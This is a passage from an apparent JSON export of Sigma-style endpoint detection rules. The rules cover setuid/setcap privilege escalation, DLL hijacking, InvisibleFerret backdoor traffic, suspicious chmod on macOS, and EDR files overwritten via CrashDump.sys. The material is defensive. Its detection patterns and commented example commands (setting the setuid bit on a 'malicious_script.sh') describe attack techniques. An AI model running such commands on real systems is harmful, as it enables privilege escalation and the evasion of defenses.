classification.Linux.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection_chmod:\n # chmod +s /home/user/malicious_script.sh\n # chmod ug+s /home/user/malicious_script.sh\n # chmod u+s /home/user/malicious_script.sh\n # chmod 2644 /home/user/malicious_script.sh\n # chmod 6644 /home/user/malicious_script.sh\n Image|endswith: '/chmod'\n CommandLine|contains:\n - ' +s'\n - 'ug+s'\n - 'u+s'\n - ' 4??? '\n - ' 6??? '\n ParentImage|contains: '?'\n\n selection_setcap:\n # setcap cap_setuid=pe /home/user/malicious_script.sh\n # setcap cap_setuid=e /home/user/malicious_script.sh\n # setcap cap_setuid=+pie /home/user/malicious_script.sh\n # setcap cap_net_bind_service,cap_setuid=pe /home/user/malicious_script.sh\n # setcap cap_setuid,cap_setgid=+pie /home/user/malicious_script.sh\n Image|endswith: '/setcap'\n CommandLine|contains: 'cap_setuid'\n ParentImage|contains: '?'\n\n exclusion_octal:\n CommandLine|startswith: 'chmod ??? /'\n\n exclusion_dpkg:\n - ParentImage: '/usr/bin/dpkg'\n - GrandparentImage: '/usr/bin/dpkg'\n - ProcessAncestors|contains: '|/usr/bin/dpkg|'\n\n exclusion_suexec:\n CommandLine: 'chmod 4510 /usr/sbin/suexec'\n ParentCommandLine: '/bin/bash /usr/lib64/plesk-?.?/install_suexec'\n\n exclusion_virtualbox:\n CommandLine:\n - 'chmod 4511 /usr/lib/virtualbox/VBoxVolInfo'\n - 'chmod 4511 /usr/lib/virtualbox/VBoxNetAdpCtl'\n - 'chmod 4511 /usr/lib/virtualbox/VBoxNetNAT'\n - 'chmod 4511 /usr/lib/virtualbox/VBoxNetDHCP'\n - 'chmod 4511 /usr/lib/virtualbox/VBoxHeadless'\n - 'chmod 4511 /usr/lib/virtualbox/VirtualBoxVM'\n ParentCommandLine: '/bin/sh /var/lib/dpkg/info/virtualbox-*.postinst configure*'\n\n exclusion_yocto_sdk:\n # chmod o-x,u+s /opt/yocto/yocto-new/build/...\n # chmod 4755 /opt/yocto/kirkstone/build..\n # chmod 4111 /opt/yocto/yocto-new/build/tmp...\n CommandLine: 'chmod * /opt/yocto/*'\n\n exclusion_vtom:\n CommandLine:\n - 'chmod 4755 /opt/vtom/manager/bin/vtmanager'\n - 'chmod 4755 /opt/vtom/abm/bin/bdaemon'\n\n exclusion_isa:\n ParentCommandLine: '/bin/bash /etc/init.d/isa status'\n\n exclusion_bitdefender:\n # /bin/sh /var/lib/dpkg/info/bitdefender-security-tools.postinst configure 7.0.5-200090\n CommandLine: 'chmod +s /opt/bitdefender-security-tools/bin/auctl'\n ParentCommandLine|startswith: '/bin/sh /var/lib/dpkg/info/bitdefender-security-tools.postinst configure'\n\n exclusion_nxserver:\n CommandLine|contains:\n - ' /etc/nx/nxserver'\n - ' /usr/nx/scripts'\n ParentCommandLine|startswith:\n - '/bin/bash /usr/nx/scripts/setup/nxserver'\n - '/usr/bin/bash /usr/nx/scripts/setup/nxserver'\n - '/bin/bash /usr/nx/scripts/setup/nxnode'\n - '/usr/bin/bash /usr/nx/scripts/setup/nxnode'\n - '/bin/bash /usr/nx/scripts/setup/nxrunner'\n - '/usr/bin/bash /usr/nx/scripts/setup/nxrunner'\n\n exclusion_apt:\n GrandparentImage:\n - '/usr/bin/apt-get'\n - '/usr/bin/apt'\n\n exclusion_dnf:\n - GrandparentImage: '/usr/bin/dnf5'\n - ProcessGrandparentCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf-automatic '\n - '/usr/bin/python? /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf '\n - '/usr/bin/python? /usr/bin/dnf '\n - '/usr/bin/python?.? /bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf-automatic'\n\n exclusion_rpm:\n ProcessAncestors|contains: '|/usr/bin/rpm|'\n\n exclusion_netdata:\n - GrandparentCommandLine: '/bin/sh /etc/cron.daily/netdata-updater'\n - CommandLine|startswith: 'chmod 4750 usr/libexec/netdata/plugins.d/'\n ParentCommandLine|startswith: './bin/bash system/install-or-update.sh '\n\n exclusion_yum:\n GrandparentCommandLine|startswith: '/usr/bin/python /bin/yum '\n\n exclusion_make:\n - ParentImage: '/usr/bin/make'\n - GrandparentImage: '/usr/bin/make'\n\n exclusion_sap:\n CommandLine: 'chmod * /usr/sap/*/exe/*'\n ParentCommandLine|startswith:\n - '/bin/sh ./oraroot.sh '\n - '/bin/sh ./saproot.sh '\n\n exclusion_oracle:\n CommandLine|contains:\n - 'chmod * /u01/app/oracle/'\n - 'chmod ???? /oracle/'\n - 'chmod ???? /exec/oracle/product/'\n - 'chmod ???? /usr/lib/oracle/agent/'\n - 'chmod ???? /opt/ORCLfmap/'\n - 'chmod ???? /opt/oracle/'\n\n exclusion_template_ansible:\n - ProcessCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/AnsiballZ_*.py'\n - ProcessParentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n\n exclusion_cloudera:\n ParentCommandLine|startswith:\n - '/usr/bin/python?.? /opt/cloudera'\n - '/usr/bin/python?.?? /opt/cloudera'\n\n exclusion_oneautomation:\n ProcessCommandLine: 'chmod 4755 /opt/oneautomation/*/agent/bin/ucxj*'\n\n exclusion_docker:\n ProcessAncestors|contains:\n - '|/usr/bin/containerd-shim-runc-v2|'\n - '|/usr/bin/runc|/usr/bin/dockerd|'\n - '|/usr/sbin/runc|/usr/bin/dockerd|'\n - '|/usr/bin/podman|'\n\n exclusion_ancestors:\n ProcessAncestors|contains:\n - '|/opt/copiloteagent/copiloteagent|'\n - '|/usr/NX/bin/nxpost|'\n\n condition: 1 of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: weak\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "058b2e5d-6e8a-4289-bfb7-96a9cc306c0f", "rule_name": "SetUID Access Flag Set via chmod/setcap", "rule_description": "Detects when chmod or setcap are used to set the SetUID bit or capability on a file.\nThis could be used by an attacker to execute a file with a different (and potentially more privileged) user context.\nIt is recommended to analyze the targeted binary as well as the process responsible for the setting change and look for privilege escalation and malicious binaries.\n", "rule_creation_date": "2022-09-26", "rule_modified_date": "2026-03-23", "rule_os": "linux", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1222.002", "attack.t1548.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "059bfeb6-d7ab-49e8-995d-d3c4bca73b53", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.592167Z", "creation_date": "2026-03-23T11:45:34.592171Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.592179Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_bdeuisrv.yml", "content": "title: DLL Hijacking via bdeuisrv.exe\nid: 059bfeb6-d7ab-49e8-995d-d3c4bca73b53\ndescription: |\n Detects potential Windows DLL Hijacking via bdeuisrv.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'bdeuisrv.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\USERENV.dll'\n - '\\WTSAPI32.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "059bfeb6-d7ab-49e8-995d-d3c4bca73b53", "rule_name": "DLL Hijacking via bdeuisrv.exe", "rule_description": "Detects potential Windows DLL Hijacking via bdeuisrv.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2021-12-10", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "059d6ada-8f39-4f7f-a79a-a0e3ef21e910", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.587052Z", "creation_date": "2026-03-23T11:45:34.587056Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.587064Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_dwwin.yml", "content": "title: DLL Hijacking via dwwin.exe\nid: 059d6ada-8f39-4f7f-a79a-a0e3ef21e910\ndescription: |\n Detects potential Windows DLL Hijacking via dwwin.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dwwin.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\wer.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "059d6ada-8f39-4f7f-a79a-a0e3ef21e910", "rule_name": "DLL Hijacking via dwwin.exe", "rule_description": "Detects potential Windows DLL Hijacking via dwwin.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2021-12-10", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "05b15125-dd13-43a6-aa65-67a40e6b9fc1", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "critical", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.619386Z", "creation_date": "2026-03-23T11:45:34.619388Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.619392Z", "rule_level": "critical", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://unit42.paloaltonetworks.com/two-campaigns-by-north-korea-bad-actors-target-job-hunters/", "https://objective-see.org/blog/blog_0x7A.html", "https://www.group-ib.com/blog/apt-lazarus-python-scripts/", "https://attack.mitre.org/techniques/T1555/003/" ], "name": "t1555_003_invisibleferret_backdoor_linux.yml", "content": "title: InvisibleFerret Backdoor Communication Detected (Linux)\nid: 05b15125-dd13-43a6-aa65-67a40e6b9fc1\ndescription: |\n Detects network communications related to the InvisibleFerret backdoor.\n InvisibleFerret is a cross-platform backdoor written in Python. The development and usage of this tool has been attributed to Lazarus Group (also known as APT38 or DPRK), a North Korean state-sponsored cyber threat group.\n InvisibleFerret consists of various components that target popular web browsers on Windows, Linux and macOS to steal login credentials and other sensitive data.\n It is recommended to investigate the process performing this action and the destination IP address to determine the legitimacy of this behavior.\nreferences:\n - https://unit42.paloaltonetworks.com/two-campaigns-by-north-korea-bad-actors-target-job-hunters/\n - https://objective-see.org/blog/blog_0x7A.html\n - https://www.group-ib.com/blog/apt-lazarus-python-scripts/\n - https://attack.mitre.org/techniques/T1555/003/\ndate: 2024/10/25\nmodified: 2025/02/14\nauthor: HarfangLab\ntags:\n - attack.collection\n - attack.credential_access\n - attack.t1056.001\n - attack.t1555.003\n - attack.command_and_control\n - attack.t1571\n - attack.exfiltration\n - attack.t1041\n - classification.Linux.Source.NetworkActivity\n - classification.Linux.ThreatActor.Lazarus\n - classification.Linux.ThreatActor.DPRK\n - classification.Linux.Malware.InvisibleFerret\n - classification.Linux.Behavior.CredentialAccess\n - classification.Linux.Behavior.SensitiveInformation\nlogsource:\n category: network_connection\n product: linux\ndetection:\n selection:\n ProcessCommandLine: 'python* /home/*/.npl'\n ProcessGrandparentImage: '/node'\n DestinationPort:\n - '1224'\n - '2245'\n\n condition: selection\nlevel: critical\nconfidence: strong", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "05b15125-dd13-43a6-aa65-67a40e6b9fc1", "rule_name": "InvisibleFerret Backdoor Communication Detected (Linux)", "rule_description": "Detects network communications related to the InvisibleFerret backdoor.\nInvisibleFerret is a cross-platform backdoor written in Python. The development and usage of this tool has been attributed to Lazarus Group (also known as APT38 or DPRK), a North Korean state-sponsored cyber threat group.\nInvisibleFerret consists of various components that target popular web browsers on Windows, Linux and macOS to steal login credentials and other sensitive data.\nIt is recommended to investigate the process performing this action and the destination IP address to determine the legitimacy of this behavior.\n", "rule_creation_date": "2024-10-25", "rule_modified_date": "2025-02-14", "rule_os": "linux", "rule_status": null, "rule_tactic_tags": [ "attack.collection", "attack.command_and_control", "attack.credential_access", "attack.exfiltration" ], "rule_technique_tags": [ "attack.t1041", "attack.t1056.001", "attack.t1555.003", "attack.t1571" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "05e6ac9c-7eac-44f4-a137-10196a85ae1b", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "medium", "rule_effective_confidence": "moderate", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.608259Z", "creation_date": "2026-03-23T11:45:34.608263Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.608270Z", "rule_level": "medium", "rule_confidence": "moderate", "rule_confidence_override": null, "references": [ "https://attack.mitre.org/techniques/T1222/002/" ], "name": "t1222_002_binary_chmodx_susp_directory.yml", "content": "title: Suspicious Binary Made Executable\nid: 05e6ac9c-7eac-44f4-a137-10196a85ae1b\ndescription: |\n Detects an attributes change on a file to make it executable in an uncommon directory.\n Adversaries may set the execute bit on a file before executing it.\n Is it recommended to check the harmlessness of the new executable file and for other suspicious behavior from the process modifying the file.\nreferences:\n - https://attack.mitre.org/techniques/T1222/002/\ndate: 2024/07/30\nmodified: 2025/11/17\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1204.002\n - attack.defense_evasion\n - attack.t1222.002\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.DefenseEvasion\nlogsource:\n product: macos\n category: filesystem_event\ndetection:\n selection:\n Kind: 'chmod'\n PrettyMode|contains: 'x'\n Image|endswith: '/chmod'\n\n selection_path:\n Path|startswith:\n - '/users/shared/'\n - '/private/tmp/'\n - '/private/var/tmp/'\n - '/private/etc/'\n - '/private/var/root/'\n - '/Volumes/'\n\n selection_ancestors:\n ProcessAncestors|contains:\n - '/users/shared/'\n - '/private/tmp/'\n - '/private/var/tmp/'\n - '/private/etc/'\n - '/private/var/root/'\n - '/Volumes/'\n\n exclusion_unix:\n Path: '/private/tmp/.*-unix'\n\n exclusion_adobe:\n Path: '/private/tmp/com.adobe.acrobat.DC/acrobat.plist'\n ProcessCommandLine: '/bin/chmod -R 777 /tmp/com.adobe.acrobat.DC'\n\n exclusion_adobe_updater:\n - Path: '/private/tmp/com.adobe.acrobat.updater'\n ProcessCommandLine: 'chmod o+w /tmp/com.adobe.acrobat.updater'\n - Path: '/private/tmp/com.adobe.AcrobatRefreshManager'\n ProcessCommandLine: 'chmod go= /tmp/com.adobe.AcrobatRefreshManager'\n\n exclusion_ansible:\n Path: '/private/tmp/ansible-tmp-*'\n ProcessCommandLine|startswith: 'chmod u+x /tmp/ansible-tmp-'\n\n exclusion_installer:\n ProcessParentCommandLine|startswith:\n - '/bin/sh /tmp/PKInstallSandbox.??????/'\n - '/bin/bash /tmp/pkinstallsandbox.??????/'\n ProcessGrandparentCommandLine|startswith:\n - '/bin/sh /tmp/PKInstallSandbox.??????/'\n - '/bin/bash /tmp/pkinstallsandbox.??????/'\n\n exclusion_dotnet:\n ProcessParentCommandLine|contains|all:\n - 'dotnet'\n - 'install'\n\n exclusion_jamf:\n - Path: '/Users/Shared/jamfdata'\n ProcessCommandLine: 'chmod -R o-w /System/Volumes/Data/Users/Shared'\n - ProcessParentCommandLine|startswith: '/bin/bash /library/application support/jamf/'\n\n exclusion_maxon:\n Path|startswith:\n - '/Users/Shared/Maxon'\n - '/Users/Shared/Red Giant'\n ProcessCommandLine|startswith:\n - 'chmod -R a+w /Users/Shared/Maxon'\n - 'chmod -R a+w /Users/Shared/Red Giant'\n\n exclusion_tunnelblick:\n Path: '/private/var/root/Library/Application Support/Tunnelblick'\n\n exclusion_common_folders:\n - ProcessParentImage|startswith:\n - '/Applications/'\n - '/Library/'\n - '/Users/*/Applications/'\n - '/Users/*/Library/'\n - ProcessGrandparentImage|startswith:\n - '/Applications/'\n - '/Library/'\n - '/Users/*/Applications/'\n - '/Users/*/Library/'\n\n exclusion_cisco:\n ProcessParentCommandLine|startswith:\n - '/bin/bash /opt/cisco/secureclient/temp/downloader/vpndownloader.sh'\n - '/bin/bash /opt/cisco/anyconnect/temp/downloader/vpndownloader.sh'\n\n exclusion_cyberwatch:\n ProcessParentCommandLine: 'find /etc/cyberwatch-agent/ -type d -exec chmod 750 {} ;'\n\n exclusion_homebrew:\n ProcessAncestors|contains: '|/opt/homebrew/Library/Homebrew/vendor/portable-ruby/*/bin/ruby|'\n\n exclusion_batchmod:\n ProcessParentImage: '/Volumes/Rescue HD/Outils/Utilitaires/BatChmod*/BatChmod.app/Contents/MacOS/BatChmod'\n\n exclusion_munki:\n ProcessParentImage: '/usr/local/munki/Python.framework/Versions/*/Resources/Python.app/Contents/MacOS/Python'\n\n exclusion_node:\n ProcessAncestors|contains: '/.nvm/versions/node/v*/bin/node|'\n\n exclusion_claude:\n ProcessGrandparentCommandLine:\n - 'claude'\n - 'node /Users/*/.nvm/versions/node/v*/bin/claude'\n - '*/.vscode/extensions/anthropic.claude-code-*-darwin-arm64/resources/native-binary/claude *'\n\n condition: selection and 1 of selection_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "05e6ac9c-7eac-44f4-a137-10196a85ae1b", "rule_name": "Suspicious Binary Made Executable", "rule_description": "Detects an attributes change on a file to make it executable in an uncommon directory.\nAdversaries may set the execute bit on a file before executing it.\nIs it recommended to check the harmlessness of the new executable file and for other suspicious behavior from the process modifying the file.\n", "rule_creation_date": "2024-07-30", "rule_modified_date": "2025-11-17", "rule_os": "macos", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.execution" ], "rule_technique_tags": [ "attack.t1204.002", "attack.t1222.002" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "05ef230b-2d48-4e49-82a9-20e1fce73c9e", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "critical", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.085767Z", "creation_date": "2026-03-23T11:45:34.085769Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.085774Z", "rule_level": "critical", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://x.com/sixtyvividtails/status/1888872344032100372?t=duYsOiMz6Df4LkTL2f20fg", "https://attack.mitre.org/techniques/T1562/001/" ], "name": "t1562_001_executable_file_overwritten_using_crashdump.yml", "content": "title: Executable File Overwritten using CrashDump.sys\nid: 05ef230b-2d48-4e49-82a9-20e1fce73c9e\ndescription: |\n Detects suspicious modification of the 'DedicatedDumpFile' registry value with a string ending with an executable or driver file extension.\n By modifying this value, the 'CrashDump.sys' driver will overwrite the file at next boot.\n Threat actors can use this technique in order to overwrite an executable that belongs to an EDR or AV to evade defenses.\n It is recommended to investigate the process that set the registry value as well as the added file path for suspicious content or actions.\nreferences:\n - https://x.com/sixtyvividtails/status/1888872344032100372?t=duYsOiMz6Df4LkTL2f20fg\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2025/02/11\nmodified: 2025/08/20\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ImpairDefenses\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\CrashControl\\DedicatedDumpFile'\n Details|endswith:\n - '.exe'\n - '.sys'\n\n exclusion_citrix:\n ProcessImage: '?:\\Windows\\System32\\msiexec.exe'\n Details|endswith: '\\dedicateddumpfile.sys'\n\n condition: selection and not 1 of exclusion_*\nlevel: critical\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "05ef230b-2d48-4e49-82a9-20e1fce73c9e", "rule_name": "Executable File Overwritten using CrashDump.sys", "rule_description": "Detects suspicious modification of the 'DedicatedDumpFile' registry value with a string ending with an executable or driver file extension.\nBy modifying this value, the 'CrashDump.sys' driver will overwrite the file at next boot.\nThreat actors can use this technique in order to overwrite an executable that belongs to an EDR or AV to evade defenses.\nIt is recommended to investigate the process that set the registry value as well as the added file path for suspicious content or actions.\n", "rule_creation_date": "2025-02-11", "rule_modified_date": "2025-08-20", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion" ], "rule_technique_tags": [ "attack.t1112", "attack.t1562.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "06168646-4339-42be-bcf4-a8f6ef23f53d", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "moderate", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", 